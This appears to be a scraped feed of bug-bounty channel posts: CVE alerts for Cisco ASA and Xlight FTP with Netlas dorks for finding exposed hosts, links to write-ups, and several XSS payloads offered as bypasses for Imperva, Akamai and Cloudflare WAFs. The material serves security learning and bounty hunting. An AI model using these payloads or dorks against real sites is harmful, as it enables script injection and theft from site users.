80% bug bounties is about understanding the application/framework/protocol and (knowing about what exactly are you doing or if it's actually worth doing)

CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating 🔥🔥🔥

The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.

More then 140k instances at Netlas.io:
👉 Link: https://nt.ls/Rfjme
👉 Dork: http.body:"/+CSCOE+/logon.html"

Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF

Happy Sunday 🫶

Wordpress juicy endpoints #bugbountytips

⚡️Found a security vulnerability in any site?
✅Check if it has a public bug bounty program:

https://xplo1t-sec.github.io/bugbounty-lookup/

#BugBounty #bugbountytips

A solid XSS payload that bypasses Imperva WAF ⚙️

<a/href="j%0A%0Davanoscript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips

Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️

/login?ReturnUrl=javanoscript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529

Cloudflare #XSS WAF Bypass by @nav1n0x

Payload:

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 

#cybersec #bugbountytips #infosec

an XSS payload to bypass some waf & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">

#infosec #cybersec #bugbountytips

Retrieves DNS records without any authentication

curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"

Replace example.com with the target domain.

1)Finding a Hidden GraphQL Endpoint
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85

2)My 2nd bounty : Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f

3)CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722

4)Linear-feedback. Shift. Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35

5)ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80

6)picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09

7)Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93

8)Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed

9)MM-ReverseIPLookup created to take a domain name and find all (A) records associated with an IP address Using Free Multiple sources,
https://github.com/FINAL094/MM-ReverseIPLookup

10)Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk

CVE-2024-46483: Integer Overflow in Xlight FTP Server, 9.8 rating 🔥

By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.

Search at Netlas.io:
👉 Link: https://nt.ls/M8D2R
👉 Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"

Read more: https://github.com/kn32/cve-2024-46483

⚡️Parameter that could be vulnerable to server side request forgery !

Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥

Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎

We also recommend checking out his website and Twitter for more tips:

👉 Site: 3rag.com
👉 Twitter: x.com/Chirag99Artani

🚨 Warning to All Members 🚨

Brut Security is a professional community focused strictly on learning and discussing cybersecurity topics. Any personal questions about religion, race, or similar matters are strictly prohibited. We are here to learn and grow as ethical hackers, not to engage in discussions unrelated to cybersecurity.

Please adhere to these guidelines:

1. Keep all conversations focused on cybersecurity topics.
2. Avoid personal questions about members’ religious or cultural backgrounds.
3. Show respect for all members—this is a safe, professional space.

Failure to follow these rules will lead to immediate removal from the group.

For Queries Related to Enrolment or Other Questions, Do Reach here @brutsecurity_bot